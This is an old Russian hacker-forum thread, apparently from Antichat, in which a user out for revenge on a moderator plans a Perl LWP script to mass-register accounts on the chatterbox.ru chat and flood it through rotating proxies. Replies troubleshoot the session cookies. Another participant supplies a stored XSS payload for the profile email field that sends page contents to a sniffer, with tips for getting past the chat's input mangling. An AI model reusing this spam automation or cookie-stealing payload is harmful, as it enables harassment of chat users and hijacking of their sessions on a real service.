Форум АНТИЧАТ - Chatterbox.ru на движке aurust

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - Chatterbox.ru на движке aurust (https://forum.antichat.xyz/showthread.php?t=694)

Предистория: Грязный модер по прозвищу АкБарс появляющийся в чате орентировочно с 23 до 2 учинил со сной экзекуцию, которой я не заслуживал, на что я пожаловался админу чата ROSTу, не получив определенного ответа, а так же не услышав извинений в свой адрес задался целью насолить (как и многие из здесь собравшихся). На данном этапе пишу скрипт авторегистрации. Не важно помогут мне или нет я его НАПИШУ (тем более, что мне интересен этот процесс как программисту, возможно в дальнейшем я подарю его Августу, но снечала они утонут в море новых ников - флудеров). Смысл скрипта - зарегить море ников и с промежутками в 10 минут заходить под случайным ником и флудить. Затем меняем прокси запускаем нового случайного (важно чтобы они были зарегены в разные дни).....

За основу взял перл с библиотекой LWP - библиотека для доступа к WWW из Perl.
Может кто подскажет кто какими средствами пользуется
Инеткрак не сохраняет кукесы (а может я просто не знаю? или кукесы сохраняются обычнм путем?), а они используют отправку куке для открытия сесии ПХП регистрации. Может кто знает особенности их скрипта? Почему то не смог с помощью ИнетКрак зарегить ни одного пользователя постоянно выбрасывает на первую страницу. Причем похожая картина наблюдалась в ИЕ в тот момент, когда я отключил куки вообще.
Пробовал брать кук ПХП с ответа сервера - не помогет.

Вобщем жду любой помощи.
Флейм не приветствуется http://forum.antichat.ru/iB_html/non...ticons/mad.gif

InetCrack поддерживает отправку кукисов.
А не получается зарегить еще одного пользователя вероятно из-за того, что ты используешь старый номер сессии, с которого уже была произведена регистрация. А для новой регистрации нужно сначала получить новый номер сессии.

(да и кстати этот чат ломается через мыло в инфе юзеров)

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ апреля 25 2003,23:39)</td></tr><tr><td id="QUOTE">InetCrack поддерживает отправку кукисов

(да и кстати этот чат ломается через мыло в инфе юзеров)[/QUOTE]<span id='postcolor'>
спасибо за оперативность ) очень рад, что здесь такие гостеприимные админы )

Можно про мыло в мыло mailsks@rambler.ru поподробнее.

Номер сесии я указвал новый после первого запроса
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/form HTTP/1.0
Accept: */*
Accept-Language: ru
Cookie: hotlog=1; b=b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: chat.chatterbox.ru
Proxy-Connection: Keep-Alive
[/QUOTE]<span id='postcolor'>
пришел куке
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
Set-Cookie: PHPSESSID=839c0f351709dda12a49e10f15a8bff2; path=/
[/QUOTE]<span id='postcolor'>
Именно его я указал в последующем

Кстати. На поминание о забытом пароле по майл - отключено (видимо в настройках)

У меня кук по этому запросу (GET http://chat.chatterbox.ru/people/form HTTP/1.0) не устанавливается. Он устанавливается где-то ранее.
В любом случае, как говорил мой знакомый, идеализма не бывает http://forum.antichat.ru/iB_html/non...cons/smile.gif Если что-то не получается, значит неправильно делаешь.
Сравнивай запросы браузера и запросы инетКрека.Ищи различия.
Возможно чат требует что бы были пройдены все странички заполнения инфы, а не только последняя (которую ты и пытаешся запостить, я так понимаю)

Касаемо взлома через мыло - посмотри на мою инфу в чате (на ник Algol) и сам все увидишь  http://forum.antichat.ru/iB_html/non...cons/smile.gif

С мылом всё понятно, вопрос можно ли отправить на страниуку со снифером?

Без проблем ...
собственно даже отправлять никуда не нужно, просто
пишешь background:url(document.all[28].innreText)
А в соответствующем поле указываешь адрес картинки снифера.
Ну конечно можно еще поизвращаться что бы скрыть левые надписи в инфе, но это уже тонкости.

Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'>
так как прямое копирование не помогло (

Получил таки куку с этой странички. помог метод ignore_discard: - сохранять даже файлы cookie, которые должны быть уничтожены (логический параметр)
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">use LWP::UserAgent;
use HTTP::Cookies;
$ua = LWP::UserAgent->new;
$ua->cookie_jar(HTTP::Cookies->new(file => "lwpcookies.txt", autosave => 1, ignore_discard => 1));
$ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
$ua->proxy(['http', 'ftp'] => 'http://161.53.73.251:80/&#39 http://forum.antichat.ru/iB_html/non...icons/wink.gif;
$req = HTTP::Request->new('GET',"http://chat.chatterbox.ru/people/form");
$res = $ua->request($req);
print $res->content if $res->is_success;[/QUOTE]<span id='postcolor'>

Получена сесия ИД:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">#LWP-Cookies-1.0
Set-Cookie3: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0; path="/"; domain="chat.chatterbox.ru"; path_spec; discard; version=0[/QUOTE]<span id='postcolor'>

Эта зараза сразу отправляет второй запрос и тут же удаляет кук
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/css.php HTTP/1.0
Accept: */*
Referer: http://chat.chatterbox.ru/people/form
Accept-Language: ru
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: chat.chatterbox.ru
Cookie: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0[/QUOTE]<span id='postcolor'>

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (1234567 @ апреля 26 2003,12:10)</td></tr><tr><td id="QUOTE">Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'>
так как прямое копирование не помогло ([/QUOTE]<span id='postcolor'>
Прямое копирование не помогло, поскольку я забыл сказать об одной тонкости (вернее я думал ты сам ее заметишь):
Г-н автор чата видимо тоже не полный ламер, и наверно седьмым чувством почувстовал что в поле email-а содержится опсаность, и потому, если строчка длинная, вставляет туда один пробел, разбивая строку и нарушая таким образом синтаксис жабаскрипта. А может это просто глюк чата.
В любом случае нужно писать скрипт так, что бы этот пробел вставился в такое место, где он не нарушит синтаксис. Поэтому в моем примере между словом javascript: и словом naviagte должно быть ровно 6 пробелов. Тогда чат вставит еще свой 7-й пробел прямо перед словом navigate и синтаскис останется верным ))).